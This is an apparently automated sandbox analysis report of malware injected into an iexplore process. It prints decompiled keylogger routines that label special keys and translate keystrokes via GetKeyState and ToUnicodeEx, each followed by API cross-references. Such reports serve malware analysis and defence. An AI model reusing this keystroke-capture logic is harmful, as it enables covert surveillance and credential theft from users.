
Numpad, xrefs: 00C85E18
[F2], xrefs: 00C85B5B
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C859B0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859B0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Process]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Process], xrefs: 00C859B2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8599F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8599F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Play], xrefs: 00C859A1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D46, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D46(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Print], xrefs: 00C85D48

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D84, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D84(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Right Alt], xrefs: 00C85D86

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C859D2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859D2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Select]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Select], xrefs: 00C859D4

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C47, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C47(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Home]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Home], xrefs: 00C85C49

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

